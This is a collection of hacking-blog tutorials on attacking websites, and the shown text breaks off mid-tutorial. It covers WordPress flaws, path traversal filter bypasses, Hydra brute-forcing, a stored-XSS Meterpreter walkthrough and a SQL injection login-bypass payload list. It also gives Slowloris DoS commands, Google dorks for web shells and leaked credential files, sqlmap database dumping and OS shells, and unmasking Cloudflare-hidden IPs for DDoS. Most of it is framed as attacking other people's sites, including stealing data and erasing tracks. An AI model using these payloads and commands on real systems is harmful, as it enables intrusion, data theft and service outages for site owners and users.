LIST OF VULNERABILITY IN WORDPRESS

Recently true-caller and Tango messenger is hacked by Syrian-Electronic-Army.

And large amount of Database has been stolen. Now what is common in these sites?
They have word-press 3.5.1 which is vulnerable to some attack.

A weakness and multiple vulnerabilities have been reported in WordPress, which can
be exploited by malicious users to disclose certain system information and bypass
certain security restrictions and by malicious people to conduct spoofing and cross-
site scripting attacks, bypass certain security restrictions, and cause a DoS (Denial of
Service).

1) An error when calculating the hash cycle count within the "crypt_private()" method
in /wp-includes/class-phpass.php can be exploited to exhaust CPU and memory
resources by sending HTTP requests with a specially crafted password cookie.

Successful exploitation of this vulnerability requires knowledge of the URL for a

password-protected post.

This vulnerability is confirmed in version 3.5.1. Prior versions may also be affected.

Here is full details & exploitation is available ;visit this link.

https://vndh.net/note:wordpress-351-denial-service

2) An unspecified error within the HTTP API related to server-side requests can be
exploited to gain access to the site.
Here is full details.
http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

3) An unspecified error can be exploited to bypass certain restrictions when

publishing posts.

Successful exploitation requires the "Contributor" role.

4) An unspecified error can be exploited to reassign the post authorship.

5) Certain input related to SWFUpload is not properly sanitised before being returned
to the user. This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.
Read more »

HOW TO EXPLOIT DIRECTORY TRAVERSAL

VULNERABILITY?
Posted by Nirav Desai at 11:09 AM Labels: hacking tools, path traversal, website hack 0 comments

Backtrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerability in
web-application. Previously i post about what is directory traversal & how to bypass its filter , but that process
is manual, it can consume lots of time.But in bactrack automatic tools are available for this test which is
DOTDOTPWN.

If you are on other distro , then you can download it form here.

It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as
HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. 

Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the
other hand, it also could be used in a scripting way using the STDOUT module.

It's written in perl programming language and can be run either under *NIX or Windows platforms. It's the
first Mexican tool included in BackTrack Linux .
Fuzzing Modules Supported In This Version:

- HTTP

- HTTP URL

- FTP

- TFTP

- Payload (Protocol independent)

- STDOUT

Read more »

HOW TO SOLVE PROBLEM OF WPSCAN IN

BACKTRACK 5 R3?
Posted by Nirav Desai at 9:36 AM Labels: hacking tools, website hack, wordpress 18 comments

Wpscan is wordpress security scanner, which is pre-installed in backtrack 5 , but it`s outdated version, so when
you tried to update it, you may  have face some problems. Here is solution which work for me.

cd /pentest/web
rm -rf wpscan
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev
gem install  bundler
bundle install
ruby ./wpscan.rb

Read more »
HOW TO BYPASSING FILTER TO TRAVERSAL
ATTACKS ?
Posted by Nirav Desai at 8:15 PM Labels: path traversal, website hack 0 comments

Bypassing Filter to Traversal Attacks

If your initial attempts to perform a traversal attack, as described previously, are unsuccessful, this does not
mean that the application is not vulnerable. Many application developers are aware of path traversal
vulnerabilities and implement various kinds of input validation checks in an attempt to prevent them. However,
those defenses are often flawed and can be bypassed by a skilled attacker.

The first type of input filter commonly encountered involves checking

whether the filename parameter contains any path traversal sequences, and if so, either rejects the request or
attempts to sanitize the input to remove the sequences. This type of filter is often vulnerable to various attacks
that use alternative encodings and other tricks to defeat the filter. These attacks all exploit the type of
canonicalization problems faced by input validation mechanisms

Always try path traversal sequences using both forward slashes and

backslashes. Many input filters check for only one of these, when the file system may support both.

Try simple URL-encoded representations of traversal sequences, using

the following encodings. Be sure to encode every single slash and dot

within your input:

dot                            %2e

forward slash           %2f

backslash                  %5c
Try Using 16-Bit Unicode–Encoding:

dot                           %u002e

forward slash          %u2215

backslash                %u2216

Try Double URL–Encoding:

dot                        %252e

forward slash         %252f

backslash                %255c

Try Overlong UTF-8 Unicode–Encoding:

dot                        %c0%2e       %e0%40%ae    %c0ae etc.

forward slash        %c0%af       %e0%80%af      %c0%2f etc.

backslash              %c0%5c       %c0%80%5c      etc.

You can use the illegal Unicode payload type within Burp Intruder to generate a huge number of alternate
representations of any given character, and submit this at the relevant place within your target parameter.
These are representations that strictly violate the rules for Unicode representation but are nevertheless accepted
by many implementations of Unicode decoders, particularly on the Windows platform.

If the application is attempting to sanitize user input by removing traversal sequences, and does not apply this
filter recursively, then it may be possible to bypass the filter by placing one sequence within another. For
example:

....//

....\/

..../\

....\\

The second type of input filter commonly encountered in defenses against path traversal attacks involves
verifying whether the user-supplied filename contains a suffix (i.e., file type) or prefix (i.e., starting directory)
that the application is expecting.

Some applications check whether the user-supplied file name ends in a

particular file type or set of file types, and reject attempts to access anything else. Sometimes this check can be
subverted by placing a URL encoded null byte at the end of your requested filename, followed by a file type
that the application accepts.

For Example:

../../../../../boot.ini.jpg

The reason this attack sometimes succeeds is that the file type check

is implemented using an API in a managed execution environment

in which strings are permitted to contain null characters (such as

String.endsWith() in Java). However, when the file is actually retrieved, the application ultimately uses an API
in an unmanaged environment in which strings are null-terminated and so your file name is effectively
truncated to your desired value.

A different attack against file type filtering is to use a URL-encoded newline character. Some methods of file
retrieval (usually on Unix-based platforms) may effectively truncate your file name when a newline is
encountered:

../../../../../etc/passwd%0a.jpg

Some applications attempt to control the file type being accessed by

appending their own file type suffix to the filename supplied by the user. In this situation, either of the
preceding exploits may be effective, for the same reasons.

Some applications check whether the user-supplied file name starts with a particular subdirectory of the start
directory, or even a specific file name. This check can of course be trivially bypassed as follows:

wahh-app/images/../../../../../../../etc/passwd

If none of the preceding attacks against input filters are successful individually, it may be that the application is
implementing multiple types of filters, and so you need to combine several of these attacks simultaneously
(both against traversal sequence filters and file type or directory filters). If possible, the best approach here is
to try to break the problem down into separate stages. For example, if the request for

diagram1.jpg

is successful, but the request for

foo/../diagram1.jpg
fails, then try all of the possible traversal sequence bypasses until a variation on the second request is
successful. If these successful traversal sequence bypasses don’t enable you to access /etc/passwd, probe
whether any file type filtering is implemented and can be bypassed, by requesting

diagram1.jpg.jpg

Working entirely within the start directory defined by the application, try to probe to understand all of the
filters being implemented, and see whether each can be bypassed individually with the techniques described.

Of course, if you have white box access to the application, then your task is much easier, because you can
systematically work through different types of input and verify conclusively what filename (if any) is actually
reaching the file system.

PATH TRAVERSAL VULNERABILITIES

TUTORIAL
Posted by Nirav Desai at 11:33 AM Labels: path traversal, website hack 0 comments

Path traversal vulnerabilities arise when user-controllable data is used by the application to access files and
directories on the application server or other back-end file system in an unsafe way. By submitting crafted
input, an attacker Exploiting Path Traversal may be able to cause arbitrary content to be read from, or written
to, anywhere on the file system being accessed. This often enables an attacker to read sensitive information
from the server, or overwrite sensitive files, leading ultimately to arbitrary command execution on the server.

Consider the following example, in which an application uses a dynamic page to return static images to the
client. The name of the requested image is specified in a query string parameter:

https://wahh-app.com/scripts/GetImage.aspx?file=diagram1.jpg

When the server processes this request, it performs the following steps:

1. Extracts the value of the file parameter from the query string.

2. Appends this value to the prefix C:\wahh-app\images\.

3. Opens the file with this name.

4. Reads the file’s contents and returns it to the client.

The vulnerability arises because an attacker can place path traversal

sequences into the file name in order to backtrack up from the image directory specified in step 2 and so access
files from anywhere on the server. The path traversal sequence is known as “dot-dot-slash,” and a typical
attack would look like this:

https://wahh-app.com/scripts/GetImage.aspx?file=..\..\windows\repair\sam

When the application appends the value of the file parameter to the name of the images directory, it obtains the
following path:

C:\wahh-app\images\..\..\winnt\repair\sam

The two traversal sequences effectively step back up from the images directory to the root of the C: drive, and
so the preceding path is equivalent to this: C:\winnt\repair\sam

Hence, instead of returning an image file, the server actually returns the repair copy of the Windows SAM file.
This file may be analyzed by the attacker to obtain usernames and passwords for the server operating system.

In this simple example, the application implements no defenses to prevent path traversal attacks. However,
because these attacks have been widely known about for some time, it is common to encounter applications
that implement various defenses against them, often based on input validation filters. As you will see, these
filters are often poorly designed and can be bypassed by a skilled attacker.

BRUTE-FORCE ATTACK USING HYDRA

Posted by Nirav Desai at 8:26 PM Labels: Brute Force, hacking tools, UBUNTU, website hack 0 comments

What Is BRUTE-FORCE Attack ?

A password attack that does not attempt to decrypt any information, but continue to try different passwords.
For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords.
To gain access to an account using a brute-force attack, a program tries all available words it has to gain access
to the account. Another type of brute-force attack is a program that runs through all letters or letters and
numbers until it gets a match.

How To Install THC-Hydra ?

Open your terminal & type following command

(1)sudo bash

(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

(3)After downloading ,we are going to extract it

tar -xvf hydra-6.3-src.tar.gz

(4)tar -xvf hydra-6.3-src.tar.gz

(5)./configure && make && install

(6)make install

How To Use THC-Hydra?

If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it
should be 21)

Now in order to brute-force a specific login form you need to define the user-name (if you don't know it
include a file containing some), the word-lists directory, the service attacking and form method and the page
itself.

Type following command in terminal

hydra -l admin -P /root/pass  127.0.0.1 http-post-form "/mutillidae/index.php?

page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you
don't know the login). 

The -p switch defines the password and the capital -P - the directory for the wordlists ( the -P is used almost
always) 

If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is
FTP simply use "ftp". 

Another thing you should be aware of is that the variables username and password are not always the same.
They different depending on the code. 

They could be usr,pwd etc - it's not necessarily for them to be as in most cases "username" & "password". Just
view the source and make sure what their names are. 

Now there are a lot more options of Hydra. I'll explain some of them below no matter that they are included in
the MAN page of hydra
-vV - The verbose mode. This mode shows you every login attempt hydra tries. 

-s - We specify the port on which we're running our attack.

-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.

-R - Restores a previously aborted session of an attack.

-e ns - Checks for blank or no password fields.

WEB APPLICATION AND AUDIT

FRAMEWORK
Posted by Nirav Desai at 10:49 AM Labels: hacking tools, website hack 0 comments

w3af is a complete environment for auditing and attacking web applications. This environment provides a solid
platform for web vulnerability assessments and penetration tests.

Download:-

The framework can be downloaded from the project main page:http://www.w3af.com/#download

Installation:-

Some of the requirements are bundled with the distribution file, in order to make

the installation process easier for the novice user. The bundled requirements can

be found inside the extlib directory. Most of the libraries can be run from that

directory, but some others require an installation process, the installation steps

for these libraries are (as root):

cd w3af

cd extlib

cd fpconst0.7.2

python setup.py install

cd ..

cd SOAPpy

python setup.py install

cd ..

cd pyPdf

python setup.py install

Running w3af:-

w3af has two user interfaces, the console user interface (consoleUI) and the

graphical user interface (gtkUi). To use console interface type

./w3af_console

w3af>>>

If you are using w3af first time then I recommended you to use graphical user interface.

./w3af_gui
The graphical user interface allows you to perform all the actions that the

framework offers and features a much easier and faster way to start a scan and

analyze the results.

If you want to know more about plugins & console interface, here is document. You can Download it.

HOW TO EXPLOIT STORED XSS USING S.E.T?

Posted by Nirav Desai at 9:17 PM Labels: metasploit, S.E.T., website hack 0 comments

Stored XSS is the most dangerous type of cross site scripting due to the fact that the
user can be exploited just by visiting the web page where the vulnerability
occurs.Also if that user happens to be the administrator of the website then this can
lead to compromise the web application which is one of the reasons that the risk is
higher than a reflected XSS.

(1)First I recommended you to view “How to fiind xss in website?” here.

(2)Open terminal & type following code in terminal.
sudo bash
cd /opt/set
./set 
(3)Now select option 1 which is Social-Engineering Attacks. 
(4)Select option 2 which is website attack vector.
(5)Select option 3which is Java Applet Attack Method.
(6)Select option 1 web -templetes.
(7)Select option 1 java Required.
(8)Now we will select payload & encoder. So we select simple Windows
Reverse_TCP Meterpreter & shikata_ga_nai encoding.
(9)Put listener port:443 . Now metasploit will open.
(10)Now we can go back to the web application and we can try to insert the malicious
JavaScript code in the comment field that we already know from before that is
vulnerable to XSS.
Read more »

SQL INJECTION AUTHENTICATION BYPASS

CHEAT SHEET
Posted by Nirav Desai at 12:43 PM Labels: authentication-bypass, website hack 0 comments

This list can be used by Hackers when testing for SQL injection authentication
bypass.A Hacker can use it manually or through burp in order to automate the
process.If you have any other suggestions please feel free to leave a comment in order
to improve and expand the list.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin',
'81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin",
"81dc9bdb52d04dc20036dbd8313ed055

Read more »

HOW TO SCAN WEB-SERVER WITH NIKTO?

Posted by Nirav Desai at 1:18 PM Labels: hacking tools, UBUNTU, website hack 0 comments
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers
for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items
such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web
servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is
fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to
give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks
that look for things that may not have a security flaw, but the webmaster or security engineer may not know
are present on the server. These items are usually marked appropriately in the information printed. There are
also some checks for unknown items which have been seen scanned for in log files.

Nikto is a tool that it has been written in Perl and it can perform tests against web servers in order to identify
potential vulnerabilities

 Download Nikto from here.

 Open terminal & extract it in folder

 Then change directory, type following code in terminal

    cd Downloads/nikto-2.1.5

 Make nikto.pl file exectuable(right click on file, & make it executable)

 Update it by typing following command

    ./nikto.pl -update

 Now final step to scan webhost type following in termina

   ./nikto.pl -host I.p

HOW TO HACK TARGETED

WEBSITE(BASIC)?
Posted by Nirav Desai at 8:52 PM Labels: website hack 0 comments

Today is the age of computer and internet. More and more people are creating their own websites to market
their products and earn more profit from it. Having your own website will definitely help you in getting more
customer purchasing your products but at the same time you can also also attract hackers to play around with
your site. If you have not taken enough care to protect your site from hackers then your business can even
come to an end because of these hackers.

Before you hack into a system, you must decide what your goals are. Are you hacking to put the system down,
gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by
formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc ... ? The point is
that you have to decide what the goal is first.

The most common goals are:

1. Breaking into the system & taking the admin privileges.

2. Gaining sensitive data, such as credit cards, identification theft, etc. - not recommended

You should have all of your tools ready before you start the next steps too hacking. There is a Linux version
called Backtrack. It is an operating system that comes with various security tools that will help you break into
systems.

You must decide how you are going to achieve your task. Plan. There is a common methodology followed by
hackers, I will mention it below. However, you can create your own methodology if you know what you are
doing.

Common steps to be taken for hacking a system:

1. Reconnaissance (footprinting)

2. Scanning

3. Ports & Services Enumeration

4. Vulnerability Assessment

5. Vulnerability Exploitation

6. Penetration and Access

7. Privilege Escalation & owning the box

8. Erase tracks

9. Maintaining access

Read more »

HOW TO EXPLOIT ROBOTS.TXT?

Posted by Nirav Desai at 7:57 PM Labels: website hack 1 comments

What Is Robots.Txt?

Robots.txt is a file that contain path which cannot crawled by bot most of time search-engine bots like google
bot or etc. It tells search-engine that this directory is private & can not be crawled by them.

If yo are site owner & want to make robots.txt file , then go following link , it will create robots.txt file for you.

http://www.mcanerin.com/EN/search-engine/robots-txt.asp
so just for now , robots.txt is pretty much what websites use to block certain pages from search engines.

Here is a sample : http://www.whitehouse.gov/robots.txt

First Method

Now this method is very rare & the web-master would have to be stupid to do this, but you'll be surprised how
many stupid people there are in the world.

This one is simple, go to one of the disallowed directories & look in the source. Sometimes web-master leave
comments there to give hints like passwords/ or user-names.

You never know you might find something juicy. :]

With this info you could possibly guess his password by entering some of the most infamous/best football
teams.

You can also check for disallowed directory which may be allowed or weak permission.Click here for python
script to audit robots.txt file automatically.
Second Method

Directory Traversal

Ok, you use directory traversal when you get denied from a web-page. For example if you go to a disallowed
directory & you get denied [404 page]

You can easily bypass that if there insecure with directory traversal. Also, getting denied from a page shows
that there must be some sexy info inside of it. :]

So lets get started.

1. Go to the directory you got denied from. I will be using an example.

www.slave.com/users/

2. Once you get denied you need to add a not found directory.

www.slave.com/users/randomwords&numbers

3. Now for the directory traversal part you need to add a /../

This will bring it back one directory, which can get you access to the disallowed directory.

www.slave.com/users/randomwords&numbers/../

Keep it mind that you can also use the first method if you get access to the directory.

Click here for more path traversal details tutorials. 

Third Method

CGI-BIN exploits

Alright, the /cgi-bin/ page has alot of public exploits out right now. So, this method only goes for if the site has
/cgi-bin/

So, anyways. I dont want my tutorial to be to big so here is a list of CGI-BIN exploits.

https://www.hellboundhackers.org/articles/7-complete-set-of-cgi-bin-exploits-and-what-they-do.html

HOW TO CRACK ANY HASH WITH HELP OF

ONLINE SERVICES?
Posted by Nirav Desai at 10:19 PM Labels: password crack, UBUNTU, website hack 0 comments

How to crack any hash with help of online services?

findmyhash.py try to crack different types of hashes using free online services.

(1)Download it from here .

(2)Open terminal & change directory where you download tool , if we download tool in download folder then
type in following command in terminal

cd Downloads

(3)python findmyhash.py

Accepted algorithms are:

MD4, MD5, SHA1, SHA256, RMD160, LM, NTLM, MYSQL, CISCO7 & JUNIPER
NOTE: for LM / NTLM it is recommended to introduce both values with this format:

python findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7

python findmyhash.py NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7

Valid OPTIONS are:

-h <hash_value> If you only want to crack one hash, specify its value with this option.

-f <file> If you have several hashes, you can specify a file with one hash per line.

NOTE: All of them have to be the same type.

-g If your hash cannot be cracked, search it in Google and show all the results.

NOTE: This option ONLY works with -h (one hash input) option.

Examples:

-> Try to crack only one hash.

python findmyhash.py MD5 -h 098f6bcd4621d373cade4e832627b4f6

-> If the hash cannot be cracked, it will be searched in Google.

python findmyhash.py SHA1 -h A94A8FE5CCB19BA61C4C0873D391E987982FBBD3 -g

-> Try to crack multiple hashes using a file (one hash per line).

python findmyhash.py MYSQL -f mysqlhashesfile.txt

HOW TO CRACK MD5 HASH IN UBUNTU?
Posted by Nirav Desai at 11:40 PM Labels: password crack, UBUNTU, website hack 0 comments

If you have an password in md5 hash and you need password in plain text for this there is lot of tool and online
websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text
password but if not than u have to use some tool like here.

We are using a perl script to crack an hash so we had encrypted an text "r2/." into a md5 hash which is
"5d28a1f53e24a8b0a85d0a53348d49ad" so here we will try to decrypt it again with perl in a plain text.

So first of all here we already know the length of text is 4 and it is included with specail characters like ". /" etc
so our job will be easy but if we dont know the length and what kind of character included in hash then what?
no problem we have some solution for that too ok lets began with first step if u are using linux here we are
using back track for this first of all you need perl script so donalod and follow the steps to crack a hash i will
try to explain each part of this script

(1)Download perl script from here.

(2)Make it exexcutable.

(3)open terminal & change directory where you download script.

(4)now type following command in terminal

perl md5crack.pl

you can see information about script. 

 
(5)type following in terminal & hit enter.

perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72

our command will be like this > perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72

ad is charset if we will use ad option that means it will try only lowercase alphabets and all digits 0-9 now 1 is
minimum lenth of hash character like a b c etc and 3 is maximum lenth of hash so this command will try all
lowercase alpha numerical from 1 to 3 lenth so if password is like abc or ab9 tc it will show us result now lets
see next command line 

 
(6)type following in terminal & hit enter.

perl md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72

see here aA charset if we will use this option than it will try

lower,uppercase alpha numerical word like "Jt3" and minimum length 3 and maximum is 3 it means it will try
like this aaa,aab,aac ............aAc etc now lets move on last command line

(7)Type following command in terminal.

perl md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72

here is charset is aAdx it will try lower,upperalpha numerical and specail charater ./*-+& etc. here minimum
lenth is 1 and maximum is 10 to it will start from a to aaaaaaaaaa the first command will finish our tast fast but
if hash included only lowercase alpha numerical word secound will try uppercase so it will took more than first
command and thrid one will took more then first and second command so how to finish our job fast ok for
cracking an hash i will say use more shell in one time like see normaly an pass length will be minimum 4 digits
so we can start from 4 and maximum may be 10 or more so here what to do we can use 6 shell in one time for
first command i will give u example here.

(8)it`s our last example.

perl md5crack.pl 4 4 900150983cd24fb0d6963f7d28e17f72

perl md5crack.pl ad 4 4 <hash here> this command will try only 4 charcter lenght word so in second shell we
can try 5 5 so that will try only 5 charcter lengh word

perl md5crack.pl ad 5 5 <hash here> like this we can use 6 6, 7 7, 8 8 , etc so minimum and maximum length
will be same so task will be finish fast and it depend on charset what kind of charset you are trying like ad,aA
or aAdx now as i told here i have an example to make understand>>> text= "r2/." and encrypted md5 hash is
"5d28a1f53e24a8b0a85d0a53348d49ad" we will try to crack it again in plain text here we will try command
line > perl md5crack.pl aAdx 4 4 5d28a1f53e24a8b0a85d0a53348d49ad 

HOW TO INSTALL & USE SLOWLORIS IN

UBUNTU?
Posted by Nirav Desai at 10:23 PM Labels: DOS attack, hacking tools, UBUNTU, website hack 0 comments

(1)Open a browser and go to this URL: ‘http://ha.ckers.org/slowloris‘ (here you can know more about what is
SLOWLORIS, & what it can do)

(2)Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to
your desktop.

(3)Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to
your desktop.

(4)Then type in your terminal:

sudo apt-get install perl-doc

and enter your password when prompted. This installs the Perl documentation module you’ll need to see the
Slowloris help page. Wait while the packages download and install.
(5)Then type this command, (all in one line) and press enter:

sudo apt-get install libhtml-parser-perl libio-socket-ssl-perl

(6)When ask yes/no type Y and press enter, this installs some libraries for Slowloris.

Again type another command, this time:

perldoc slowloris.pl

and hit enter. This will show the documentation for Slowloris. I usually type Crtl+X+Y=enter to save it as a
record but if you like you can just scan it and type Crtl+X to get rid of it.

(7)Next you should type

sudo perl slowloris.pl -dns example.com -port 80 -test

hit enter and password if requested. This tests the server to see what it’s timeout window is. Wait until the test
finishes, it will take several minutes. When it’s done it will tell you what timeout value to use….something
along the likes of ‘Use 240 seconds for -timeout’.

(8)In the terminal window type,

sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5

This performs the actual attack, if your time out test told you to use another timeout value use that.

(9)In your browser window reload the target page and you should see an error message that the server is
unavailable. The attack has made the target site unavailable to all users.

To stop the attack just type Ctrl+C.

SOME COOL GOOGLE DORK
Posted by Nirav Desai at 9:36 PM Labels: hack, website hack 1 comments

Symlink dork.

Code:

inurl:/sym/root/ & intext:"Parent Directory"

c99shell dork.

Code:

inurl:(shell.php | c99.php) Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

c99shell dork(2).

Code:

inurl:(shell.php | c99.php) intitle:c99shell Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self
remove Logout

WordPress MySQL details.

Code:

inurl:(wp-config.conf | wp-config.txt) ext:(conf | txt | config)

Databases username && passwords.

Code:

inurl:/includes/ & ext:inc & inurl:connect | inurl:dbconnect & -site:phpkode.com

Phish The Phisher

Code:

filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="

phpmyadmin exploit

Code:

allinurl:index.php?db=information_schema

Here is list of other google dork. Download here.

HOW TO DO SQL INJECTION FROM LINUX?

Posted by Nirav Desai at 8:38 PM Labels: UBUNTU, website hack 0 comments

Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os
which has python installed.So it also works in windows.SQLMAP is far more advanced than HAVIJ.

How To Use SqlMap?

(1)Download SQLMAP here.

(2)Now extract it wherever you want.

(3)Change directory & I mean if you extract to download then, open terminal & type following code

cd Downloads

cd sqlmapproject-sqlmap-f305dde

(4)Now if you want to find url is vulnerable to sql injection or not. Type following command
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”

(5)To get database of website. Type following command in terminal

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dbs

(6)To get tables & columns of database , type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”--

tables --columns
(7)To Get data of particular database & Table , type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --

dump -D “database_name” -T “table _name”

Now , you can view all database from following directory.

/home/nirav/Downloads/sqlmapproject-sqlmap-f305dde/output
What`S Next You Can Do?

1-Execute arbitrary Sql command on the server

This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter
can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or
something similar. Or may be change/modify the content of cms pages etc.

Another parameter --sql-shell would give an sql shell like interface to run queries interactively.

2-Get inside the admin panel and play

If the website is running some kind of custom cms or something similar that has an admin panel, then it might
be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple
and short length passwords can be broken simply by brute forcing, however long length complex passwords
may not be breakable.

Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot
greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to
execute arbitrary system commands. Php web shell scripts can be uploaded to do the same thing.

3-Shell on remote OS

This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the
tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on
remote system, but it has many limitations of its own.

HOW TO FIND REAL I.P. PROTECTED BY

CLOUD FLARE?
Posted by Nirav Desai at 8:40 PM Labels: i.p address, website hack 18 comments
All these methods are based on bad admin configurations, but still are quite common

If you want to find real I.P. address of website, which is hidden by CLOUDFLARE. It has came to my
attention that many booters, hosts, malicious websites, and more use CloudFlare for DDoS Protection & Anti-
Abuse Report Protection. With CloudFlare protection, it is difficult to get the hosts IP; therefore, it is difficult
to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain any website
protected by CloudFlare's real IP, which can be used for whatever you desire!

METHOD 1:-

If you simply ping the domain , it will give i.p. which is not website`s real i.p. address. you should try
following option to get real I.P. address of domain.

ping direct-connect.domain.com

             OR

ping direct.domain.com

             OR

ping ftp.domain.com

             OR

ping cpanel.domain.com

             OR

ping mail.domain.com

METHOD 2 :-
For a Long Aged Domain you can use netcraft toolbar to check real ip

For Example

Code:

http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Clearly We can see change in IP to a cloudflare one.

METHOD 3 :-

You can try bruteforcing DNS , some subdomain will have real IP of website.

For this purpose you need NMAP tools.

Open your terminal with root privellege & type following code

# nmap -sV -sS -F <target>

it will scan host & give results , it`s not give real i.p. of website.(but from this you can know weather website
is protected by CLOUDFLARE or not)

Now type following code in terminal

# nmap --script dns-brute -sn <target>

it will give you real I.P. of website.

I made simple bash script which do all things for you.For more details click here. 
IF all of above methods does not work ;then there is no admin misconfiguration. So you cannot find real I.P.

HOW TO DO SQL INJECTION MANUALLY?

Posted by Nirav Desai at 10:11 PM Labels: website hack 1 comments

According to Wikipedia, SQL injection is a code injection technique that exploits a security vulnerability
occurring in the database layer of an application. The vulnerability is present when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly
typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can
occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are
also known as SQL insertion attacks.

You can also do it by using some tools ,here we are doing without use of tools.

If you want to do easily with help of tools then read my previous tutorial using HAVIJ here .

Let us have a look at the contents of this tutorial..

Part One - Website Assessment

- Finding a vulnerable website

- Determining the amount of columns

- Finding which columns are vulnerable

Part Two - Gathering Information

- Determining the SQL version

- Finding the database

Part Three - The Good Part

- Finding the table names

- Finding the column names

- Displaying the column contents

- Finding the admin page

Let us begin now.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what
we will be covering in Part One along with how to assess the information that we gather.

Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google
or with an exploit scanner. If you are unfamiliar with the term "dorks",

Dorks are website URLs that are possibly vulnerable. In SQL injection these dorks look like this:

Code:
inurl:page.php?id=

This will be inputted into Google's search bar and because of the "inurl:" part of the dork, the search engine
will return results with URLs that contain the same characters. Some of the sites that have this dork on their
website may be vulnerable to SQL injection.

Now let's say we found the page:

Code:

http://www.thesite.com/page.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so
it looks like this:

Code:

http://www.thesite.com/page.php?id=1'

or

http://www.thesite.com/page.php?id='1

After pressing enter, if this website returns an error such as the following:

Code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

/home1/michafj0/public_html/gallery.php on line 5

Or something similar, this means it's vulnerable to injection.

Determining the amount of columns

